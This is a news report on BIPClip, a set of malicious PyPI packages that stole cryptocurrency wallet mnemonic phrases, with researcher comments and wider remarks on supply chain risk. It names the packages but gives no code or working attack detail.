A group of threat hunters has uncovered a series of seven packages on the Python Package Index (PyPI) repository designed to pilfer BIP39 mnemonic phrases utilized for recovering private keys of cryptocurrency wallets.

Referred to as BIPClip by ReversingLabs, this software supply chain attack initiative has garnered attention. The packages, which were removed from PyPI after being downloaded 7,451 times collectively, include:

The BIPClip campaign, targeting developers engaged in cryptocurrency wallet security and generation projects, has been operational since at least December 4, 2022, with the initial publication of hashdecrypt on the registry.

Security researcher Karlo Zanki, in a report shared with The Hacker News, commented, “This is just the latest software supply chain campaign to target crypto assets.” Zanki emphasized that cryptocurrency remains a prime focus for threat actors exploiting the software supply chain.

To evade detection, the perpetrators behind the campaign meticulously crafted one of the packages, mnemonic_to_address, to appear benign, with the exception of listing bip39-mnemonic-decrypt as a dependency, which harbored the malicious element.

Zanki elaborated, “The imported module and invoked function names were deliberately chosen to resemble legitimate functions, minimizing suspicion, given that BIP39 standard implementations involve numerous cryptographic operations.”

The package’s primary function is to extract mnemonic phrases and transmit the data to a server controlled by the threat actor.

Additionally, two other packages identified by ReversingLabs, public-address-generator and erc20-scanner, function similarly by luring users to disclose mnemonic phrases to a common command-and-control (C2) server.

Conversely, hashdecrypts operates differently by independently harvesting data with nearly identical code embedded within.

The software supply chain security firm highlighted references to a GitHub profile under the name “HashSnake,” which promotes a repository named hCrypto as a tool for extracting mnemonic phrases from crypto wallets using the hashdecrypts package.

A detailed review of the repository’s commit history revealed that the campaign has been ongoing for over a year, as evidenced by a Python script that previously imported the hashdecrypt package (without the “s”) until March 1, 2024, coinciding with the upload of hashdecrypts to PyPI.

It’s noteworthy that the threat actors associated with the HashSnake account maintain a presence on Telegram and YouTube to promote their tools, including a video released on September 7, 2022, showcasing a crypto logs checker tool named xMultiChecker 2.0.

Zanki remarked, “The content of each package was meticulously crafted to minimize suspicion, with a clear focus on compromising crypto wallets and siphoning off the contained cryptocurrencies. This targeted approach reduced the likelihood of detection by security and monitoring tools in compromised organizations.”

These findings underscore the security risks inherent in open-source package repositories, exacerbated by the exploitation of legitimate platforms like GitHub to distribute malware.

Moreover, abandoned projects have become an attractive avenue for threat actors to hijack developer accounts and release trojanized versions, setting the stage for widespread supply chain attacks.

“Abandoned digital assets are not relics of the past; they are ticking time bombs, increasingly exploited by attackers to infiltrate open-source ecosystems,” as highlighted by Checkmarx in a recent report.

“The MavenGate and CocoaPods case studies illustrate how abandoned domains and subdomains can be compromised to deceive users and propagate malicious activities.”

If you found this article intriguing, it is a contributed piece from one of our esteemed partners. For more exclusive content, follow us on Twitter  and LinkedIn.